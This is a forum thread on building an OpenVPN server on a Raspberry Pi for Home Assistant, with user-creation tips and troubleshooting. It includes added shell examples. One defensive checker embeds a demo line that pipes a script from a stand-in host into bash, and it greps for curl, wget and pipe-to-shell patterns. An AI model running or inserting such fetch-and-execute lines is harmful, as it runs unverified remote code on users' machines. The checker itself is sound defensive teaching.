@Robbrad, Thanks for this, very interesting. Naturally it raises a couple of questions…
I have read through the first guide and it is indeed very well written and I kind of followed most of it (certainly enough to know what was going on) but:
It refers specifically to Ubuntu, I use hassio on a Pi and I am pretty old-school (emphasis on the ‘old’) with all my IT experience being IBM, Microsoft and the like. All this Linux, Python etc. is very new to me.
As I was reading the guide, at the back of my mind I was thinking ‘what a lot of steps, any one of which done wrong might compromise what I am trying to achieve. Surely something that can be written down in such concise instructions could be wrapped up in an idiot proof script of some sort?’.
A combination of those two lines of thought got me searching the web. I found lots of tutorials for setting up a VPN server on a Pi, in fact it seems that this is one of those projects that many tout the Pi as being ideal for.
Specifically I found PiVPN (based on OpenVPN) which does seem to wrap almost all of the set up into a script. I also found a few tutorials for setting up PiVPN and as well, it is hosted on GitHub. All of which led me to think it could be a legitimate option.
I am not asking for actual personal advice as I know you can’t give that on a user by user basis but does it seem reasonable to you to go down that route?
Firstly fantastic to hear and to be honest this is the objective I set out to do - just get people to dip their toe into this and think about what they wanted / understand how a VPN was a sound choice - yep following the guide will get results but exploration is also recommended.
Couple of extra diagrams to help with the above explanation.
You're correct, there are a lot of steps - but until you forward a port to the VPN server on the router, you can’t really go wrong - I would say you can just uninstall OpenVPN / purge it - or start over - I’d always recommend if people are running stable Pi builds, to image their SD card to a hard drive for backup - so it can be flashed back at the point of failure - it's the same process as initially flashing the SD card for the Pi but in reverse. SD to Img file.
I started writing out all the steps but just found myself pretty much copying Digital Ocean - which I didn’t feel was right as this was the guide I followed.
Correct - It's written for Ubuntu - but OpenVPN runs on many systems - so choose the one that’s right for you. FYI Raspbian which runs on a Pi is based on Debian - Ubuntu is also based on Debian - so the commands should all work.
Pi’s do make great VPN servers - but be aware that it needs to run some well maintained VPN software with regular updates and fixes - PiVPN looks very good - but I’d really want to do the steps myself so I knew what it was doing, I had a quick look at the scripts it uses and it just automates a lot of the commands.
Overall this is something that takes time to setup but is worth it once done - as you will be able to do so much with it with some security peace of mind (in that only the VPN server is open on your router).
The PiVPN site tells you to install it by downloading a script via curl and directly executing it by piping it into a bash shell.
There is no verification that what you downloaded is actually what you intended, or that it has not been compromised in some way. I would not trust any site that tried to get you to do this, let alone something related to security.
At the very least you should download the code first and inspect it manually to make sure it does something like you expect, and doesn’t download anything else.
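The "download first, inspect, then decide" workflow the post above recommends, as an added example (not code from the thread, from PiVPN or from any project it mentions). The installer body, the URL and the digests are constructed for the demo; in real use the expected digest comes from the project's release notes or a signed checksum file obtained over a separate channel, never from the same page that serves the script.

```shell
#!/bin/sh
# Added example: replace "curl ... | bash" with download, verify, inspect.
# The script contents and digests below are constructed for the demo.

# Print the SHA-256 hex digest of a file (GNU coreutils or BSD/macOS userland).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_script FILE EXPECTED_SHA256 -> exit 0 only when the file matches.
verify_script() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# count_network_calls FILE -> number of lines that fetch or execute further
# code (curl, wget, a pipe into a shell, eval). A non-zero count is the cue
# to read those lines before running anything.
count_network_calls() {
    grep -cE 'curl|wget|[|] *(ba)?sh|eval' "$1" || true
}

# review_download FILE EXPECTED_SHA256
# Runs the checks in order and refuses to continue on a digest mismatch.
# It never executes the script itself; that decision stays with the reader.
review_download() {
    if ! verify_script "$1" "$2"; then
        echo "digest mismatch: do not run $1" >&2
        return 1
    fi
    n=$(count_network_calls "$1")
    echo "digest OK; $n line(s) fetch or execute further code:"
    grep -nE 'curl|wget|[|] *(ba)?sh|eval' "$1" || true
    return 0
}

# Constructed demo: an "installer" that quietly pulls in more code.
demo() {
    f=$(mktemp)
    printf '%s\n' '#!/bin/bash' \
        'echo "installing..."' \
        'curl -sSL https://example.invalid/extra.sh | bash' > "$f"
    # Stand-in for the digest you would have obtained out of band.
    published=$(sha256_of "$f")
    review_download "$f" "$published"
    rm -f "$f"
}
demo
```

The grep pattern is deliberately crude: it is a reading aid, not a scanner. Its job is to point you at the lines where the installer hands control to something it did not ship with, which is exactly what a one-line `curl | bash` hides.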
@Robbrad
Rob, I just want to say thank you for taking the time to put this together and sharing it with the community.
I recently learnt how to set up a reverse proxy and configured my setup as such.
However, it seems this is not sufficient and a VPN may be the way forward.
I echo this.
This community is wonderful, some extremely helpful people, and I wouldn’t have my HA system running as well as it is today if it weren’t for the help I’ve had here. But what you have done is avoid speaking down to people who don’t have the same skill set as you, something that is sometimes lacking here. Sometimes too many assumptions are made about what the questioner knows about or understands, making the reply appear condescending however helpful their intent.
@klogg
Agreed, on my reverse proxy write-up I start with a short rant exactly about some individuals’ attitude; but anyway, the reality is that most people are genuinely helpful and kind.
Ok, I am going to try and set aside some time to do this, it seems like I have nothing to lose - until I open that port!
So I am reading the guide again and I have a question (and I am only at the pre-requisites!!!) but I think it is a simple one. It points you to a guide for creating the appropriate user (I told you Linux wasn’t my thing!) and setting up the firewall but that guide also talks about adding public key authentication. Is that appropriate in this case?
No problem - depending on where you plan to do this - as long as you're not logging in as root you probably already have a sudo user - and it will be the user you use for your Pi. If not and it is root (scary) then - login as root and do the following.
Use the command: adduser <username>
Follow the wizard, then do: usermod -aG sudo <username>
That’s all you need to do - SSH key exchange isn’t required at this stage, nor is the firewall stuff.
I would then login as this user and use it for all activity on the Pi from that point - don’t do things as root.
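The two commands from the reply above (adduser, then usermod -aG sudo), as an added example that is not from the thread: wrapped so they can be re-run without harm, plus a check that the membership actually took, read from a group file in /etc/group format. The group file contents in the demo are constructed; on a real Pi you would point the check at /etc/group. Only ensure_sudo_user needs root.

```shell
#!/bin/sh
# Added example: create the non-root admin user and confirm sudo membership.
# The group file used by the demo is constructed for the example.

# ensure_sudo_user NAME: create the account if missing, then put it in sudo.
ensure_sudo_user() {
    if ! id "$1" >/dev/null 2>&1; then
        adduser "$1"            # interactive: asks for password and details
    fi
    usermod -aG sudo "$1"       # -a appends; without it other groups are lost
}

# sudo_members GROUPFILE: print the comma-separated member list of the
# "sudo" line in a file laid out like /etc/group.
sudo_members() {
    awk -F: '$1 == "sudo" { print $4 }' "$1"
}

# in_sudo_group NAME GROUPFILE -> exit 0 when NAME is listed under sudo.
in_sudo_group() {
    sudo_members "$2" | tr ',' '\n' | grep -qx "$1"
}

# Constructed demo: a group file as it would look after
# "usermod -aG sudo alice" on a Pi that already had the default "pi" user.
demo() {
    g=$(mktemp)
    printf '%s\n' 'root:x:0:' 'sudo:x:27:pi,alice' 'users:x:100:' > "$g"
    if in_sudo_group alice "$g"; then
        echo "alice can use sudo; log in as alice from now on, not as root"
    fi
    rm -f "$g"
}
demo
```

The membership check matters because group changes only apply to new logins: after usermod, log out and back in before testing `sudo`, and verify against `/etc/group` (or `getent group sudo`) rather than trusting that the command printed nothing.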
A fantastic write up - thank you for taking the time to do it! I’m particularly interested in the 2FA aspect of this and look forward to setting that up.
One question from me on the below. I believe this means that you’ll still then need a port forward straight to HA for some components, correct? Which still leaves us open to someone finding the login page as you described in the OP? In other words, to “lock it down” but still retain remote access, one would need to forgo the use of any services that need to be pointed at Home Assistant directly, i.e. Google Assistant. And I realize that “lock it down” and “retain remote access” inherently contradict each other a bit lol. Apologies if this isn’t the right place for the question, the conversation just led me to consider this.
How is the Google Assistant configured? - do you currently forward a port on your router to HA for Google to access your HA server?
UPDATE I just read the component page for Google Assistant - that’s really not the best, shame it works in that way. Let me do some more reading - it might be ok, or maybe there is another way this component can connect
Part of setting up the component involves entering your URL, so it points to my.domain.com which is fed via port forward to HA. In my case I have nginx in the middle of that, but I think the concept is still the same. Any component that requires you to enter your HA URL I am assuming isn’t going to work through a VPN and thus still require an open port straight to HA. Again, don’t mean to derail here, just wanted to make sure it’s clear and I’m not missing anything. I feel like I’ve seen a handful of components that work like this, but Google Assistant is the one that stands out and I’m sure is fairly widely used.
Thanks @Robbrad! I had setup Google Assistant before this was made available, so might be time to switch over. I see it’s free to use for now. I’d been avoiding any subscriptions like the plague, but one that supports this great platform and community might be worth breaking the rule! And I suppose you can’t put a price on security!
I had seen this and I was a little bummed it cost money - but HA has given me so much value it’s worth the money if it supports that - it also works very well, e.g. it's FAST.
I was really hoping not to have to ask anything else but I have hit a small problem. Perhaps you can help, perhaps it’s a Pi thing?
When trying to build the certificate authority (Step 4) and after the source vars command I get:
No /home/pi/OpenVPN-ca/openssl.cnf file could be found
Further invocations will fail
The next line of output is the expected:
NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/sammy/openvpn-ca/keys
but
./build-ca
fails with the same file could not be found error.
I know you are not here to support the Digital Ocean docs but just in case it is something simple or obvious…
For the record, I have been through the process twice, both times with a fresh install of Raspbian.